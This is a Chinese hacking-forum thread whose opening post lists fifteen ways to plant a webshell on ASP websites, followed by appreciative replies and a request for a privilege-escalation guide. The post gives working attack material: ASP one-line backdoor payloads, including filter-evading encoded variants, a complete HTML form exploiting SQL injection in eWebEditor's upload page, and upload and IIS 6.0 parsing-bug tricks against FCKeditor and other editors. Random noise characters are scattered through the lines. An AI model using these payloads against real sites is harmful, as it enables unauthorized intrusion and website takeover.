返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式2 w( ?( i& o* J9 U' `1 P

" d" p# u2 d* x3 g8 D! J) Q2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
  U" S/ H& N2 ]# s
  f2 e1 l; r% k0 D. L+ b9 x# I& K3.上传漏洞:1 J% x6 }& |/ W3 x
! R" }3 s2 w& b5 l$ U
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
0 q4 Q( ~% B) ^5 Z4 C$ O1 L
- _5 r5 T5 t) q4 }  J, c7 W逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
3 Q/ H, Q( f" \2 Y1 Z
" p' U$ }! K$ }0 S/ \雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
* ^) x( {# V0 i然后在上传文件里面填要传的图片格式的ASP木马
, I) A$ D( i& l就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp5 \4 b7 X9 A" K0 M
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
; ^( [' l2 }" F0 K+ Q3 N6 ]* ]  G+ e2 j" c1 {( f
<html>& g. ?0 U5 d$ i( d! j4 H
<head>; H$ ]* f) I9 T& J1 W
<title>ewebeditor upload.asp上传利用</title>( b9 O7 U$ C. i! y; k
</head>  |& l/ v. i# E: J3 @2 l% k# f
<body>
- \! j" r; b+ }* `<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
2 X) [0 r0 H- N* Z" x: S<input type=file name=uploadfile size=100><br><br>: S$ X0 ?2 ^* Y6 d3 q0 }
<input type=submit value=Fuck>* f1 G) o* N1 U
</form>
* A) b- g7 `7 @5 F</body>
# Y9 O/ f" M: o. @5 R3 N+ v</form>* [& I- x; `/ g( g. x$ p
</html>
9 ^& l1 e+ p; `1 a$ M
; f/ w" a3 }$ o6 g2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
; t2 T- h7 a/ M0 L" i' R6 Z5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
! Z( S9 u8 A( l1 F2 ?& H% \6 a" G  \+ D! s& u" N
利用windows2003解析。建立zjq.asp的文件夹
2 M; i4 ?% T, \+ I. l; y  g6 A
2 Q9 _. S* }8 l7 M( U8 |- `6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
- i2 Y* C/ C6 E3 z' P, j; F+ I& _/ I
7.cuteeditor:类似ewebeditor
7 W4 u. q$ g+ V5 p
; b) c. e0 I8 x1 a3 d" Z8.htmleditor:同上
9 g. O3 F2 ^- y9 X
$ j" z4 c; ?: e6 T$ \9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
/ U3 f$ H: `6 t% f  v8 Z
& k/ ?" G( k6 d  u6 F<%execute request("value")%><%'<% loop <%:%>
; m1 D, U1 Z3 y3 ?. P4 H
! L' x/ [* ?1 }) Q% V<%'<% loop <%:%><%execute request("value")%>
: e/ `5 W) V: g# f0 ~% d; `' a" K3 r7 S8 ^: ^3 R
<%execute request("value")'<% loop <%:%>! F% G* g$ g1 P  j, n
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
8 q" \: X& N" {+ F7 b8 x6 {) r1 o# ^1 ~1 i
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞- J6 ?4 c& l$ Z. Q. y1 A2 G
- e) O+ I' k: _) |# C- M$ A
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3: N/ c+ \& R; l; l  n& p1 _
; o9 Y9 @' S( B3 I; l
解析漏洞得到webshell
- q! [/ v4 b) I8 S8 }/ |# L& d- F+ \8 v/ }$ d/ F2 H. K
12.mssql差异备份,日志备份,前提需知道web路径% I& J! N) H7 n* X. C( _

: T7 O% \1 W) [/ w; L& H9 N/ q1 a1 Y13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
0 K! A+ A+ u/ K3 a6 r( {/ G, K( [0 @# Y; _- N. `
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
* P. a" H3 [' j2 R9 K4 y6 a: G+ y/ F8 A0 O6 @) a) k
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可1 H! v# m, p- u/ s8 ^
& p+ Q8 g  u! t* S% x: l9 N! J) ~
以上只是本人的一些拙见,并不完善,以后想到了再继续添加- z/ F) V. Y- \& r! e
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
& w: d  }3 ]  M0 y$ l+ h  c  w- \% R: _" C/ ^$ w) e

" J; z, t0 D4 }) ]: e4 C很好啊、基本的入侵方法都包含了
! n0 b& H2 M2 i+ h' f2 Y9 g! U6 F7 ?. V- a4 I$ M& W% `; g$ n& i. X
最好来个提权的帖子再。
; }/ b2 D# Q8 p( H0 {9 Z% A' p* g- C/ S
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表